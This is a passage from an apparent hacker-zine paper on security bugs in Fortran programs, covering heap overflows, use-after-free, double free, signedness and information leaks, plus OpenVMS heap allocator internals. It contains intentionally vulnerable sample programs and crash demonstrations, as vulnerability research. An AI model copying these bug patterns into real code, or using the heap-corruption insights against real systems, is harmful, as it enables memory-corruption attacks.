$ ./a.out
|
|
5 5 0 5 5
|
|
4 4 4 4
|
|
3 3 3
|
|
-----END POINTER 2-----
|
|
|
|
*) 'p_a' is an integer array pointer.
|
|
|
|
*) 'p_b' and 'p_a' are the same kind of object despite the syntax being
|
|
slightly different (but equivalent in the end).
|
|
|
|
*) 'c' is an array whose size is still unknown. The ALLOCATABLE
|
|
parameter specifies that memory will be requested before any use.
|
|
This is a dynamically allocated array.
|
|
|
|
*) ALLOCATE() is the intrinsic function responsible of the allocation.
|
|
(and yes its calling syntax is _shit_ but let's deal with it)
|
|
|
|
*) DEALLOCATE() will free previously requested memory.
|
|
|
|
The link between ALLOCATE() and the libc allocator is easy to see:
|
|
|
|
------------------------------------------------------
|
|
$ ltrace -e malloc,free ./a.out
|
|
malloc(20) = 0x087009a0
|
|
malloc(16) = 0x087009b8
|
|
malloc(12) = 0x087009d0
|
|
5 5 0 5 5
|
|
4 4 4 4
|
|
3 3 3
|
|
free(0x087009a0) = <void>
|
|
free(0x087009b8) = <void>
|
|
free(0x087009d0) = <void>
|
|
------------------------------------------------------
|
|
|
|
This alone is sufficient to prove that malloc (respectively free) and
|
|
ALLOCATE (respectively DEALLOCATE) are 'almost' the same. The difference
|
|
between both is studied in another subsection.
|
|
|
|
Heap overflows
|
|
--------------
|
|
|
|
A buffer overflow in an ALLOCATEd area _is_ a heap overflow. Such a bug may
|
|
occur if:
|
|
|
|
*) The user is able to manipulate the index used with the array POINTER
|
|
to perform an out of bound operation:
|
|
|
|
------------------------------------------------------
|
|
$ ./bof_array_malloc AAAAAAAAAAAAAAAAAAA
|
|
INITIAL ARGUMENT = AAAAAAAAAAAAAAAAAAA [ 20 ]
|
|
ONCE CLEANED :AAAAAAAAAAAAAAAAAAAA
|
|
$ ./bof_array_malloc AAAAAAAAAAAAAAAAAAAA
|
|
INITIAL ARGUMENT = AAAAAAAAAAAAAAAAAAAA [ 141 ]
|
|
ONCE CLEANED :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAA
|
|
*** glibc detected *** ./bof_array_malloc: free(): invalid next size [...]
|
|
======= Backtrace: =========
|
|
/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0xb7625591]
|
|
/lib/tls/i686/cmov/libc.so.6(+0x6cde8)[0xb7626de8]
|
|
/lib/tls/i686/cmov/libc.so.6(cfree+0x6d)[0xb7629ecd]
|
|
[...]
|
|
------------------------------------------------------
|
|
|
|
*) The user is able to somehow induce a bug in the allocation either
|
|
exploiting an arithmetic mistake of the behavior of ALLOCATE
|
|
(discussed further).
|
|
|
|
Dangling pointers
|
|
-----------------
|
|
|
|
By default, pointers are undefined when declared. As a result there should
|
|
not be any reference nor manipulation of these objects until their
|
|
association. The unfamiliar programmer might be tempted to use the
|
|
ASSOCIATED() intrinsic function for safety purpose which (un)fortunately is
|
|
a mistake:
|
|
|
|
-----BEGIN POINTER 3-----
|
|
$ cat pointer3.f90
|
|
PROGRAM pointer1
|
|
INTEGER, TARGET :: a
|
|
INTEGER, POINTER :: p_a
|
|
write(*,*) associated(p_a)
|
|
nullify(p_a)
|
|
write(*,*) associated(p_a)
|
|
p_a => a
|
|
write(*,*) associated(p_a)
|
|
END PROGRAM
|
|
$ gfortran pointer3.f90
|
|
$ ./a.out
|
|
T <-- *WRONG* :)
|
|
F <-- Right
|
|
T <-- Right
|
|
-----END POINTER 3-----
|
|
|
|
*) p_a is declared and 'undefined' by default.
|
|
|
|
*) associated() falsely reports that p_a is associated.
|
|
|
|
*) Since the pointer is associated, the programmer can perform
|
|
operations and a memory corruption is very likely to appear.
|
|
|
|
Let's try to understand what's happening:
|
|
|
|
------------------------------------------------------
|
|
(gdb) disass MAIN__
|
|
Dump of assembler code for function MAIN__:
|
|
0x080485d4 <+0>: push ebp
|
|
0x080485d5 <+1>: mov ebp,esp
|
|
0x080485d7 <+3>: sub esp,0x188
|
|
0x080485dd <+9>: mov DWORD PTR [esp+0x4],0x80488a0
|
|
0x080485e5 <+17>: mov DWORD PTR [esp],0x8
|
|
0x080485ec <+24>: call 0x80484c4 <_gfortran_set_options@plt>
|
|
0x080485f1 <+29>: mov DWORD PTR [ebp-0x168],0x8048880
|
|
0x080485fb <+39>: mov DWORD PTR [ebp-0x164],0x4
|
|
0x08048605 <+49>: mov DWORD PTR [ebp-0x170],0x80
|
|
0x0804860f <+59>: mov DWORD PTR [ebp-0x16c],0x6
|
|
0x08048619 <+69>: lea eax,[ebp-0x170]
|
|
0x0804861f <+75>: mov DWORD PTR [esp],eax
|
|
0x08048622 <+78>: call 0x80484e4 <_gfortran_st_write@plt>
|
|
0x08048627 <+83>: cmp DWORD PTR [ebp-0xc],0x0 ; p_a == 0 ?
|
|
0x0804862b <+87>: setne al ; al = ~(p_a == 0)
|
|
0x0804862e <+90>: movzx eax,al ; eax = al
|
|
------------------------------------------------------
|
|
|
|
OK OK easy. First p_a is read on the stack then its value is compared with
|
|
0 (NULL). If p_a is not zero then it's supposed associated (ah ah). However
|
|
since the local variable is uninitialized, it could take any value and in
|
|
our case some stack address thereby explaining the bug.
|
|
|
|
Now more interesting. If operations are performed using p_a on the base of
|
|
the result returned by associated() then an invalid memory dereference may
|
|
occur and depending on whether we can control this address or nor it might
|
|
end up either as a 'Segmentation Fault' or as a perfectly controlled
|
|
arbitrary memory write. I discovered this really interesting issue reading
|
|
a cool website [R7] which details a few other interesting issues that won't
|
|
be discussed in this paper.
|
|
|
|
Use-after-free bugs
|
|
-------------------
|
|
|
|
Does the compiler keep track of POINTER object? Will it prevent the
|
|
programmer from misusing them? Let's write an example once more:
|
|
|
|
-----BEGIN POINTER 4-----
|
|
$ cat pointer4.f90
|
|
PROGRAM pointer4
|
|
INTEGER, POINTER :: p1(:)
|
|
INTEGER, POINTER :: p2(:)
|
|
ALLOCATE(p1(10))
|
|
p2 => p1
|
|
p2 = 2
|
|
DEALLOCATE(p1)
|
|
p2 = 3 ! REALLY bad :(
|
|
END PROGRAM
|
|
$ gfortran pointer4.f90 -O3
|
|
$ gdb ./a.out
|
|
[...]
|
|
(gdb) disassemble MAIN__
|
|
[...]
|
|
0x080485cb <+27>: mov DWORD PTR [esp],0x28
|
|
0x080485d2 <+34>: call 0x80484cc <malloc@plt>
|
|
0x080485d7 <+39>: test eax,eax
|
|
0x080485d9 <+41>: mov ebx,eax ; p2 => p1
|
|
0x080485db <+43>: je 0x8048679 <MAIN__+201>
|
|
0x080485e1 <+49>: mov DWORD PTR [eax],0x2
|
|
[...]
|
|
0x08048626 <+118>: mov DWORD PTR [esp],eax
|
|
0x08048629 <+121>: call 0x804849c <free@plt>
|
|
0x0804862e <+126>: mov DWORD PTR [ebx],0x3 ; BUG!!!
|
|
[...]
|
|
-----END POINTER 4-----
|
|
|
|
So not only does the compiler nothing but still the bug is really there. Oh
|
|
man Fortran is just like C after all :) With that in mind, it's rather
|
|
obvious that doublefree() are possible and indeed they are:
|
|
|
|
-----BEGIN DFREE 1-----
|
|
$ cat double_free.f90
|
|
SUBROUTINE check(x,L)
|
|
CHARACTER, TARGET :: x(L)
|
|
CHARACTER, POINTER :: p(:)
|
|
INTEGER I
|
|
p => x
|
|
DO I=1,L
|
|
IF (ichar(p(I)) .lt. ichar('A')) THEN
|
|
goto 100
|
|
END IF
|
|
IF (ichar(p(I)) .gt. ichar('Z')) THEN
|
|
goto 100
|
|
END IF
|
|
END DO
|
|
RETURN
|
|
|
|
100 write(*,*) '[-] Warning argument is fucked !!!'
|
|
DEALLOCATE(p) ! If the argument has an invalid character
|
|
! then it's free()ed.
|
|
END SUBROUTINE
|
|
|
|
PROGRAM double_free
|
|
[...]
|
|
call check(q,realsize)
|
|
write(*,*) '[+] First argument is ', q
|
|
deallocate(q) ! Second free()
|
|
[...]
|
|
$ ./double_free ACAAAAAAZ
|
|
[+] First argument is ACAAAAAAZ
|
|
$ ./double_free ACAAAAAAZ-
|
|
[-] Warning argument is fucked !!!
|
|
[+] First argument is AAAAZ-
|
|
*** glibc detected *** ./double_free: double free or [...]
|
|
[...]
|
|
-----END DFREE 1-----
|
|
|
|
The shit behind ALLOCATE()
|
|
---------------------------
|
|
|
|
We all know that in C allocation of a user supplied size can be dangerous
|
|
if not well handled as it can have side effects. Common problems include
|
|
too large request which would ultimately result in a NULL being returned or
|
|
integer overflows in the calculus of the size.
|
|
|
|
Since ALLOCATE() is no more than a wrapper of malloc() all of these
|
|
problems can occur. However there is an even more vicious one. Let's play a
|
|
little bit:
|
|
|
|
-----BEGIN ALLOCATE-----
|
|
$ cat allocate.f90
|
|
PROGRAM allocate1
|
|
IMPLICIT NONE
|
|
|
|
INTEGER(1) :: M1
|
|
CHARACTER, DIMENSION(:), ALLOCATABLE :: C
|
|
|
|
write(*,*) 'How much objects should I allocate ?'
|
|
read(*,*) M1
|
|
ALLOCATE(C(M1))
|
|
|
|
END PROGRAM
|
|
$ gfortran allocate.f90
|
|
$ ltrace -e malloc ./a.out
|
|
How much objects should I allocate ?
|
|
16
|
|
malloc(16) <-- Ok = 0x09eed9a0
|
|
+++ exited (status 0) +++
|
|
$ ltrace -e malloc ./a.out
|
|
How much objects should I allocate ?
|
|
0
|
|
malloc(1) <-- WTF ??? = 0x082a69a0
|
|
+++ exited (status 0) +++
|
|
$ ltrace -e malloc ./a.out
|
|
How much objects should I allocate ?
|
|
-20
|
|
malloc(1) <-- WTF (again) ??? = 0x089e99a0
|
|
+++ exited (status 0) +++
|
|
-----END ALLOCATE-----
|
|
|
|
Wait, something is weird. Why is there a malloc(1)??? A short look at GDB
|
|
and we have the following dead listing:
|
|
|
|
------------------------------------------------------
|
|
0x080487fa <+170>: lea eax,[ebp-0x9] ; eax = &M1
|
|
0x080487fd <+173>: mov DWORD PTR [esp+0x4],eax
|
|
0x08048801 <+177>: mov DWORD PTR [esp+0x8],0x1
|
|
0x08048809 <+185>: mov DWORD PTR [esp],ebx
|
|
0x0804880c <+188>: call 0x804862c <_gfortran_transfer_integer@plt>
|
|
; read(stdin, &M1, 1)
|
|
[...]
|
|
0x08048819 <+201>: movzx edx,BYTE PTR [ebp-0x9] ; edx = M1
|
|
0x0804881d <+205>: mov eax,0x1 ; eax = 1
|
|
0x08048822 <+210>: test dl,dl
|
|
0x08048824 <+212>: jle 0x8048836 <MAIN__+230> ; if(dl <= 0)
|
|
; malloc(eax)
|
|
0x08048826 <+214>: mov eax,edx
|
|
[...]
|
|
0x08048836 <+230>: mov DWORD PTR [esp],eax
|
|
0x08048839 <+233>: call 0x804865c <malloc@plt>
|
|
[...]
|
|
-------------------------------------------------------
|
|
|
|
So when a null or a negative size is supplied, malloc allocates 1 byte. Why
|
|
such a strange behavior? I must confess that I couldn't find any satisfying
|
|
answer but the most important thing is: if the user can supply a negative
|
|
length then a really tiny allocation is done which is really prone to heap
|
|
corruptions. So nice :)
|
|
|
|
|
|
---[ 3.4 - Other interesting bugs
|
|
|
|
Talking about insecure programming in Fortran would not be complete without
|
|
what's following. Despite not being as important, it might become handy in
|
|
a few situations.
|
|
|
|
Uninitialised data
|
|
------------------
|
|
|
|
The first thing to notice is that it's perfectly legal to use variables
|
|
without properly initializing them:
|
|
|
|
-----BEGIN UNINITIALIZED 1-----
|
|
$ cat uninitialized.f90
|
|
PROGRAM uninitialized
|
|
INTEGER :: I, J, XXXX
|
|
DO I=0,20
|
|
J = J + 1
|
|
END DO
|
|
write(*,*) J, XXXX
|
|
END PROGRAM
|
|
$ gfortran uninitialized.f90
|
|
$ ./a.out
|
|
148818352 -1215630400
|
|
$ ./a.out
|
|
135645616 -1215855680
|
|
-----END UNINITIALIZED 1-----
|
|
|
|
The compiler did not complain whereas J and XXXX were clearly not properly
|
|
set. Thanks to the ASLR we have the proof that there is no default value
|
|
which results in an information leak of the stack.
|
|
|
|
Information leak
|
|
----------------
|
|
|
|
There are a lots of possible situations in which an info leak could occur.
|
|
I've found a couple of them and there are probably even more.
|
|
|
|
*) The (in)direct access to uninitialized data. This situation is the
|
|
direct consequence of what was explained previously.
|
|
|
|
*) As said in Chap 3.1, in a few situations you will be able to control
|
|
the index used to access arrays or strings. Now depending on the
|
|
nature of the access (read or write) you will either have an info
|
|
leak or a memory corruption.
|
|
|
|
The following example is a perfect illustration:
|
|
|
|
-----BEGIN LEAK 1-----
|
|
$ cat leak1.f90
|
|
PROGRAM LEAK
|
|
INTEGER :: C(10)
|
|
C = Z'41414141'
|
|
DO I=0,size(C)-1
|
|
write(*,*) C(I)
|
|
END DO
|
|
END PROGRAM
|
|
$ gfortran leak1.f90
|
|
$ ./a.out
|
|
1 <-- C(0) is out of bounds
|
|
1094795585
|
|
1094795585
|
|
1094795585
|
|
1094795585
|
|
1094795585
|
|
1094795585
|
|
1094795585
|
|
1094795585
|
|
1094795585
|
|
$
|
|
-----END LEAK 1-----
|
|
|
|
*) Something which is sometimes not well understood is the string
|
|
initialization. This could turn to our advantage :)
|
|
|
|
-----BEGIN LEAK 2-----
|
|
$ cat leak2.f90
|
|
PROGRAM leak2
|
|
CHARACTER(len=20) :: S
|
|
S(1:4) ='AAAA'
|
|
write(*,*) S
|
|
END PROGRAM
|
|
$ gfortran leak2.f90
|
|
$ ./a.out
|
|
AAAA.... <-- info leak
|
|
-----END LEAK 2-----
|
|
|
|
The mistake in the previous code was to use an index for
|
|
initialization purpose. Indeed the proper way would be to do:
|
|
S = 'AAAA' which would set the 4 first characters to 'A' and the 16
|
|
remaining to ' ' (the space character as there is no use of '\0' in
|
|
Fortran).
|
|
|
|
Note that Phrack publications are intrinsically not compatible with
|
|
info leaks due to 7bits ASCII constraints. OK OK lame joke, forgive
|
|
me ;-)
|
|
|
|
---
|
|
|
|
---[ 4 - Back to the good ol' OpenVMS friend
|
|
|
|
For the vast majority of post 80s hackers, OpenVMS is without a doubt a
|
|
strange beast. It's not UNIX and the DCL syntax seems insane (in fact it is
|
|
as it could take you a while to figure out how to change the current path).
|
|
But contrary to other old and insanely fucked OS like AIX (hey now you have
|
|
a non exec stack! So _impressive_ ... ), it's an interesting challenge to
|
|
hack it.
|
|
|
|
People may argue that it's also so specific that you might never cross one
|
|
in your lifetime so why choosing it? Hum. Let's say that:
|
|
|
|
*) it's not _that_ rare. Though you may probably not see lots of them on
|
|
the Internet, there are still a plenty of them in production [R8].
|
|
|
|
*) it's one of the few platforms really using Fortran nowadays. UNIX
|
|
itself though useful for teaching purpose is not representative.
|
|
|
|
*) both the OS, the architecture (alpha, itanium), and the compiler (HP)
|
|
are different. A differential will help us to find out the bug
|
|
classes that may be platform dependant.
|
|
|
|
A recent and interesting blackhat presentation gave the first clues about
|
|
how to exploit basic overflows on this OS [R9]. This will not be repeated
|
|
though the special case of heap overflow is detailed in Chap 4.2.
|
|
|
|
Notes:
|
|
|
|
*) I tried as much as possible not to refer to the Alpha asm as it's
|
|
really ugly (and deadlisting are too much verbose unfortunately). The
|
|
readers willing to become familiar with this architecture should read
|
|
the excellent [R12].
|
|
|
|
*) If you want to experiment OpenVMS, I recommend you to play with the
|
|
excellent "Personal Alpha" which is able to run OpenVMS iso. Another
|
|
interesting solution is to play with free shells such as the ones
|
|
provided by the Deathrow OpenVMS cluster (thx guyz btw) [R20].
|
|
|
|
---[ 4.1 - Common Fortran bugs .vs. OpenVMS
|
|
|
|
Let's get straight to the point: almost every type of bugs presented also
|
|
exists with the VMS compiler. However, due to the implementation of the
|
|
language, a few differences exist.
|
|
|
|
Note: The tests were performed on OpenVMS 8.3 (Alpha architecture).
|
|
|
|
The stack overflow case
|
|
-----------------------
|
|
|
|
Let's play with the (slightly modified) 'CAST 2' example:
|
|
|
|
-----BEGIN VMS STACK OV 1-----
|
|
$ type cast2.f90
|
|
SUBROUTINE dump(S)
|
|
CHARACTER(len=20) :: S
|
|
S = 'AAAA'
|
|
write(*,fmt='(A,A)') ' S=',S
|
|
END SUBROUTINE
|
|
PROGRAM cast2
|
|
CHARACTER(len=10) :: X
|
|
X = 'ZZZZZZZZZZZ'
|
|
write(*,fmt='(A,Z10)') '\&X=', %LOC(X)
|
|
CALL dump(X)
|
|
END PROGRAM
|
|
$ fort cast2
|
|
$ lin cast2
|
|
$ r cast2
|
|
&X= 40000 <-- the local buffer is _not_ on the stack
|
|
S=AAAA
|
|
-----END VMS STACK OV 1-----
|
|
|
|
So there is no crash and the local buffer is not a stack buffer. Let's dig
|
|
a little bit more with the debugger:
|
|
|
|
-----BEGIN VMS STACK OV 2-----
|
|
$ r /debug cast2
|
|
[...]
|
|
DBG> go
|
|
&X= 40000
|
|
S=AAAA
|
|
%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
|
|
DBG> dump /hex %hex 40000:%hex 40080
|
|
20202020 20202020 20202020 41414141 AAAA 0000000000040000
|
|
00000000 00000000 00000000 20202020 ............ 0000000000040010
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040020
|
|
[..]
|
|
-----END VMS STACK OV 2-----
|
|
|
|
OK so there is an overflow since 20 bytes are written but it's _not_ a
|
|
'stack' overflow. Troublesome isn't it? Can we exploit it since we cannot
|
|
corrupt the saved registers? Hum. I would say that the exploitation of such
|
|
a bug is without a doubt heavily dependant of the context. If metadata can
|
|
be overwritten then there may be a way to exploit the program, if not it
|
|
seems quite unlikely... :<
|
|
|
|
The implicit typing
|
|
-------------------
|
|
|
|
Let's quote the "HP Fortran for OpenVMS Language Reference Manual":
|
|
|
|
---
|
|
Chap 3.5.1.2 Implicit Typing Rules
|
|
|
|
"By default, all scalar variables with names beginning with I, J, K, L, M,
|
|
or N are assumed to be default integer variables. Scalar variables with
|
|
names beginning with any other letter are assumed to be default real
|
|
variables. [...]"
|
|
---
|
|
|
|
As a result, if the documentation is correct, there should be an overflow.
|
|
Let's verify it:
|
|
|
|
-----BEGIN IMPLICIT TYPE 3-----
|
|
$ type implicit_typing3.f90
|
|
SUBROUTINE set(I)
|
|
write(*,*) 'How much do u want to read dude ?'
|
|
read(*,*) I
|
|
END SUBROUTINE
|
|
|
|
PROGRAM IMPLICIT_TYPING
|
|
IMPLICIT NONE
|
|
INTEGER(1) :: A, B
|
|
A = 0
|
|
B = 0
|
|
write(*,fmt='(A,Z10),(A,Z20)') ' A=',A , '\&A=', %LOC(A)
|
|
write(*,fmt='(A,Z10),(A,Z20)') ' B=',B , '\&B=', %LOC(B)
|
|
CALL set(B)
|
|
B = B + 140
|
|
write(*,*) 'A=',A,'B=',B
|
|
END PROGRAM
|
|
$ fort implicit_typing
|
|
$ lin implicit_typing
|
|
$ r /debug implicit_typing
|
|
[...]
|
|
DBG> go
|
|
A= 0
|
|
&A= 40008 [L1]
|
|
B= 0
|
|
&B= 40000 [L2]
|
|
How much do u want to read dude ?
|
|
2147483647
|
|
A= 0 B= -117 [L3]
|
|
%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
|
|
DBG> dump /hex %hex 40000 : %hex 40010
|
|
00000000 00000000 00000000 7FFFFF8B ................ 0000000000040000 [L4]
|
|
00000000 .... 0000000000040010
|
|
-----END IMPLICIT TYPE 3-----
|
|
|
|
*) Since &A - &B = 8, an overflow of at least 9 bytes would be required
|
|
to corrupt A from B ([L1],[L2]).
|
|
|
|
*) The memory dump proves that the implicit behavior is exactly what is
|
|
described in the reference manual [L4].
|
|
|
|
*) Unless the compiler was smart enough to allocate space on the stack
|
|
to prepare the manipulation in set(), there is clearly an overflow
|
|
as B is definitely a 1 byte buffer in the MAIN_() [L3].
|
|
|
|
The signedness issue
|
|
--------------------
|
|
|
|
As stated earlier, Fortran's integers are signed which means that it's not
|
|
possible to have signedness bugs unless there is a cast induced by an
|
|
external function call.
|
|
|
|
Let's see a short example using the LIB$MOVC3() function wich is similar to
|
|
the memcpy() from libc:
|
|
|
|
-----BEGIN SIGNED 1-----
|
|
SUBROUTINE copy(S,L)
|
|
INTEGER(2) L
|
|
CHARACTER D(80) ! Destination buffer
|
|
CHARACTER*(*) S
|
|
write(*,fmt='(A,Z10),(A,Z20)') ' Len=',L , '\&Len=', %LOC(L)
|
|
write(*,fmt='(A,Z10),(A,Z20)') '\&D=', %LOC(D), '\&S=',%LOC(S)
|
|
|
|
! This C function will perform the copy
|
|
CALL LIB$MOVC3(L,%REF(S),%REF(D)) [L2]
|
|
write(*,*) 'D is ', D
|
|
END SUBROUTINE
|
|
|
|
PROGRAM CMOOV
|
|
CHARACTER(16) Guard0
|
|
CHARACTER(80) S
|
|
CHARACTER(16) Guard1
|
|
INTEGER(2) length
|
|
|
|
write(*,fmt='(A,Z10)') '\&Guard0=',%LOC(Guard0)
|
|
write(*,fmt='(A,Z10)') '\&Guard1=',%LOC(Guard1)
|
|
write(*,*) '1. Buffer string?'
|
|
read(*,*) S
|
|
write(*,*) '2. String len?'
|
|
read(*,*) length
|
|
|
|
! Secure check
|
|
IF (length .gt. 80) THEN [L1]
|
|
write(*,*) 'S is too long man ...', length
|
|
STOP
|
|
END IF
|
|
|
|
DO I=1,len(Guard0)
|
|
Guard0(I:I) = 'Y'
|
|
Guard1(I:I) = 'Z'
|
|
END DO
|
|
|
|
write(*,*) '3. Copying ... '
|
|
CALL copy(S,MIN(len_trim(S),length))
|
|
|
|
END PROGRAM
|
|
-----END SIGNED 1-----
|
|
|
|
*) A security check is performed in [L1]. However due to the signedness
|
|
issue, a user may be able to bypass it by suppling a negative value.
|
|
|
|
*) The copy function is called with the negative size [L2].
|
|
|
|
As expected, LIB$MOVC3() implicitly castes the integer as unsigned and if a
|
|
negative length is supplied, a crash occurs.
|
|
|
|
-----BEGIN SIGNED 2-----
|
|
$ r /debug MOVC3
|
|
[...]
|
|
DBG> go
|
|
&Guard0= 40068
|
|
&Guard1= 40058
|
|
1. Buffer string?
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
2. String len?
|
|
16 <-- let's first copy 16 bytes
|
|
3. Copying ...
|
|
Len= 10
|
|
&Len= 7AE3DA58 <-- stack address
|
|
&D= 40000 <-- global data address
|
|
&S= 40078 <-- global data address
|
|
D is AAAAAAAAAAAAAAAA <-- copy was successful
|
|
|
|
%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
|
|
DBG> dump /hex %hex 40000:%hex 40100
|
|
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040000
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040010
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040020
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040030
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040040
|
|
5A5A5A5A 5A5A5A5A 00000000 00000010 ........ZZZZZZZZ 0000000000040050
|
|
59595959 59595959 5A5A5A5A 5A5A5A5A ZZZZZZZZYYYYYYYY 0000000000040060
|
|
41414141 41414141 59595959 59595959 YYYYYYYYAAAAAAAA 0000000000040070
|
|
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040080
|
|
20202020 20202020 41414141 41414141 AAAAAAAA 0000000000040090
|
|
20202020 20202020 20202020 20202020 00000000000400A0
|
|
20202020 20202020 20202020 20202020 00000000000400B0
|
|
00000000 00000000 20202020 20202020 ........ 00000000000400C0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400D0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400E0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400F0
|
|
00000000 .... 0000000000040100
|
|
[...]
|
|
DBG> go
|
|
&Guard0= 40068
|
|
&Guard1= 40058
|
|
1. Buffer string?
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
2. String len?
|
|
-1
|
|
3. Copying ...
|
|
Len= FFFF <--- We are requesting a 65535 bytes copy
|
|
&Len= 7AE3DA58
|
|
&D= 40000
|
|
&S= 40078
|
|
%SYSTEM-F-ACCVIO, access violation, reason mask=00,
|
|
virtual address=0000000000042000, PC=FFFFFFFF80C85234, PS=0000001B
|
|
[...]
|
|
DBG> dump /hex %hex 40000:%hex 40100
|
|
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040000
|
|
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040010
|
|
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040020
|
|
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040030
|
|
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040040
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040050
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040060
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040070
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040080
|
|
00000000 00000000 00000000 00000000 ................ 0000000000040090
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400A0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400B0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400C0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400D0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400E0
|
|
00000000 00000000 00000000 00000000 ................ 00000000000400F0
|
|
00000000 .... 0000000000040100
|
|
-----END SIGNED 2-----
|
|
|
|
Comparing the difference between both executions, it's easy to see that the
|
|
overflow was effective as Guard0, Guard1, S and even length were
|
|
overwritten. The crash occurs during the copy because of the guard page
|
|
located at 0x42000 (the page is not mmaped). This case is probably not
|
|
exploitable but is sufficient to prove the reality of signedness bugs on
|
|
a VMS environnement.
|
|
|
|
Is such a situation likely to happen? Fortunately, yes. Indeed, HP is nice
|
|
enough to make easy the use of the VMS API in every supported language. For
|
|
example you will see countless examples in the official documentation
|
|
explaining how to call VMS functions when programming in Fortran, VAX asm,
|
|
C, etc. A bit of googling confirmes it.
|
|
|
|
|
|
---[ 4.2 - Playing with the heap
|
|
|
|
Like I said before, OpenVMS developers usually tend (even in Fortran) to
|
|
use the VMS native RTL API which is far more granular than the classical C
|
|
malloc/free functions [R13]. However, ALLOCATE() and DEALLOCATE() could be
|
|
chosen for portability purpose which is why we focus on them in this study.
|
|
|
|
What will be shown below are the global algorithms behind malloc/free and
|
|
ALLOCATE/DEALLOCATE as they are almost the same (if not exactly the same).
|
|
More generally, it is believed that this result could easily be transposed
|
|
to the VMS kernel heap [R14] though the adaptation itself is left as an
|
|
exercise for the reader.
|
|
|
|
Understanding the VMS malloc/free API
|
|
-------------------------------------
|
|
|
|
Unallocated memory is grouped into "bins" of (almost) similar sizes,
|
|
implemented by using a single-linked list of chunks (with a pointer stored
|
|
in the unallocated space inside the chunk) as illustrated below:
|
|
|
|
+-------+ +-------+ +-------+
|
|
| Bin X |---->| Chunk |---->| 0x0 |
|
|
+-------+ +-------+ +-------+
|
|
| ... |
|
|
+-------+ +-------+ +-------+ +-------+ +-------+
|
|
| Bin Y |---->| Chunk |---->| Chunk |---->| Chunk |---->| 0x0 |
|
|
+-------+ +-------+ +-------+ +-------+ +-------+
|
|
| ... |
|
|
+-------+ +-------+
|
|
| Bin Z |---->| 0x0 |
|
|
+-------+ +-------+
|
|
|
|
In this particular case, at least 4 free() have already been performed. Now
|
|
let's have a look at the chunk 'returned' by malloc():
|
|
|
|
|
|
4 bytes
|
|
<------------------------------------->
|
|
|
|
<-------->
|
|
1 byte
|
|
|
|
chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|
| SIZE |
|
|
+-------------------------------------+
|
|
| tag = 0xF00D | Bin_ID | 0x00 |
|
|
mem -> +-------------------------------------+
|
|
| |
|
|
. .
|
|
. DATA .
|
|
. .
|
|
| |
|
|
+ + + + + + + + + + + + + + + + + + + +
|
|
|
|
With :
|
|
|
|
*) SIZE: the size of the chunk in bytes. It may be rounded.
|
|
*) 0xF00D: a tag which indicates that the chunk is allocated.
|
|
*) Bin_ID: The ID of the Bin corresponding to the allocated SIZE.
|
|
*) mem: the pointer returned by malloc() or ALLOCATE().
|
|
|
|
If the user performs a free() or a DEALLOCATE() on this chunk, a slight
|
|
modification occurs:
|
|
|
|
4 bytes
|
|
<------------------------------------->
|
|
|
|
<-------->
|
|
1 byte
|
|
|
|
chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|
| SIZE |
|
|
+-------------------------------------+
|
|
| tag = 0x7777 | Bin_ID | 0x00 |
|
|
mem -> +-------------------------------------+
|
|
| NEXT_MEM |
|
|
+-------------------------------------+
|
|
| |
|
|
. .
|
|
. free (uncleaned) space .
|
|
. .
|
|
| |
|
|
+ + + + + + + + + + + + + + + + + + + +
|
|
|
|
With:
|
|
|
|
*) SIZE and Bin_ID being unchanged.
|
|
*) 0x7777: a tag indicating that the chunk is not allocated anymore.
|
|
*) NEXT_MEM: a pointer to the next chunk's mem of the same bin. It can
|
|
be the NULL pointer if there is no more free chunks in the list.
|
|
|
|
Note: It may sound silly not to point to the next 'chunk' directly but
|
|
that's how things are done friends.
|
|
|
|
The free() algorithm is somewhat basic and can essentially be described
|
|
using the following pseudo code:
|
|
|
|
-----BEGIN free()-----
|
|
free(void *p):
|
|
CHUNK *c, *head;
|
|
c = chunk_from_mem(p);
|
|
c->tag = 0x7777;
|
|
head = get_head_from_chunk(c); [L1]
|
|
c->NEXT_MEM = head->first; [L2]
|
|
head->first = c; [L3]
|
|
-----END free()-----
|
|
|
|
